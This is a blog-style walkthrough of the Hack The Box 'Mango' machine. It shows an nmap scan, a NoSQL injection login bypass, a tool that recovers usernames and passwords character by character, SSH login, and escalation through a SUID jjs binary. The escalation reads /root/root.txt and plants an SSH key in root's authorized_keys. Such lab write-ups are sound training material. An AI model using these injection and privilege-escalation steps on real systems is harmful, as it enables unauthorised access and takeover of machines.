When life gives you mangos. This box has little to do with real mangos, but differs only 1 letter from a well-known NoSQL platform. And here is the initial access to this box. An interesting Medium box that raised my score by 30 points and from Hacker to Pro Hacker on Hack The Box..
[0x1] Reconnaissance & Enumeration
A new box, a new scan. It sounds boring, but every box starts with a good scan. This gives a good idea of where your starting point can be at the beginning of the journey.
nmap -sC -sV -T5 -p- -oA ~/Documents/boxes/mango/magno-allports 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 11:37 GMT
Nmap scan report for staging-order.mango.htb (10.10.10.162)
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Sweet & Juicy
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
You will not see a website on port 80 based on IP-address or hostname mango.htb. Then again at 443 it does. The first thing that appears is a message that the certificate is incorrect.
Tip: if you receive a certificate notification, be sure to check the certificate. Even if you expect it to be incorrect, it is often worth it. Mango’s certificate contains an interesting hostname: staging-order.mango.htb.
Before I go to view the hostname on the certificate, I first have to sift through the standard website. However, there is not immediately anything interesting to find here. It’s a search engine similar to Google, but your XSS and other tricks won’t deliver. The analytics link provides access to all kinds of data, but may be further archived under the rabbitholes.
Then try that hostname of the certificate. That looksa lot better.
[0x2] Initial foothold
Here too all kinds of ways to abuse the login form started. SQL injection didn’t work, but when trying NoSQL injection I got surprising result. A page that is Under Plantation . So there is a possibility for NoSQL injection.
username[$ne]=dopamine&password[$ne]=dopamine&login=login
Coincidentally, I recently saved a url for a handy tool that can do NoSQL injection and is suitable for MongoDB (hey, that sound like Mango;)).
git clone https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration.git
Cloning into 'Nosql-MongoDB-injection-username-password-enumeration'...
remote: Enumerating objects: 56, done.
remote: Counting objects: 100% (56/56), done.
remote: Compressing objects: 100% (56/56), done.
remote: Total 56 (delta 15), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (56/56), done.
The Python script provides you with a number of parameters, such as; the url, the names of the fields, the field to be tested and the login button. He starts a pattern and completes letter by letter. Of course I removed some superfluous output to avoid that there is a very long list.
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -op login:login -ep username -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
2 username(s) found:
admin
mango
Two usernames in the pocket. Now I do the same again, but for the passwords.
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -op login:login -ep password -m POST
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
No pattern starts with 'y'
No pattern starts with 'z'
2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2
Two hits here too. Now all you have to do is try which user matches which password, but then you will notice quickly enough when you log in.
- Username: admin / Password: t9KcS3>!0B#2
- Username: mango / Password: h3mXK8RhU~f{]f5H
First I try to log in with the user: admin , but this is without result. The port is open according to the Nmap scan, but apparently the user is not allowed to connect.
ssh admin@10.10.10.162
admin@10.10.10.162's password:
Permission denied, please try again.
Then we continue with the user; mango . This time I get access via SSH and I am logged in.
sudo ssh mango@10.10.10.162
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ECDSA) to the list of known hosts.
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
[0x3] Path to User flag
There is nothing interesting in the home directory of mango, just some scripts from other HTB-ers. I browse to admin’s folder and here I find the user-flag. Unfortunately, no rights to view the content. From the session of mango I try via sudo to change the account to admin. This is fine and I have gone a step further and can use a full shell.
mango@mango:~$ su admin
Password:
$ whoami
admin
bash
[0x4] Path to Root flag
Via SimpleHTTPServer I start a web server on my own machine and download LinPeas (Linux Privilege Escalation Awesome Script) for further enumeration.
wget http://10.10.14.120:8000/linpeas.sh
--2020-02-26 09:57:54-- http://10.10.14.120:8000/linpeas.sh
Connecting to 10.10.14.120:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 144338 (141K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[================================================================>] 140.96K 159KB/s in 0.9s
2020-02-26 09:57:55 (159 KB/s) - ‘linpeas.sh’ saved [144338/144338]
The script gives a lot of output and checks the machine for the presence of cron jobs, places where I have too many rights, vulnerable processes and so on. Twice run into / usr / lib / jvm / java-11-openjdk-amd64 / bin / jjs . Both as an interesting file and a place where admin has rights to execute where only root should have it. JJS is a command line tool used to execute commands to the so-called Nashhorn engine.
admin@mango:/tmp$ bash linpeas.sh
linpeas v2.3.4 by carlospolop
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/bin/fusermount
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/umount ---> BSD/Linux(08-1996)
/bin/su
/bin/ping
/snap/core/7713/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount ---> BSD/Linux(08-1996)
/snap/core/7713/usr/bin/chfn ---> SuSE_9.3/10
..
..
..
/usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
On GTFOBIns I come across jjs with some well known private edge escalations. One for a shell, and one for reading files. To test if it works I try to read the output of /root/root.txt from jjs
The breakout succeeds and I now have rights to read root.txt. Fine to get the points, but yeah… .. it’s not a shell yet.
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs
8a8ef79a7a2fbb01ea81688424e9ab15
A second method is to write data. In this case I take the content of my public key on my Parrot VM and write it to the authorized keys of the root user on Mango. With this I should be able to log in based on my private key without a password. Provided that root is allowed to connect via SSH, of course.
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs -scripting
$EXEC("echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABg[[........]]h87orudH7MJ2bFhALQ0=' > /root/.ssh/authorized_keys");
Successful! connecting as root using the authorized key was successful. And besides the root flag, I now also have a full shell on the machine. Who am I? Root!
ssh -i /root/.ssh/id_rsa mango
Enter passphrase for key '/root/.ssh/id_rsa':
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Feb 26 09:46:26 UTC 2020
Last login: Thu Oct 10 08:33:27 2019
root@mango:~# hostname
mango
root@mango:~# whoami
root
root@mango:~# ls -l
total 4
-r-------- 1 root root 33 Sep 27 14:32 root.txt
cat root.txt
8a8ef79a7a2fbb01ea81688424e9ab15
Add comment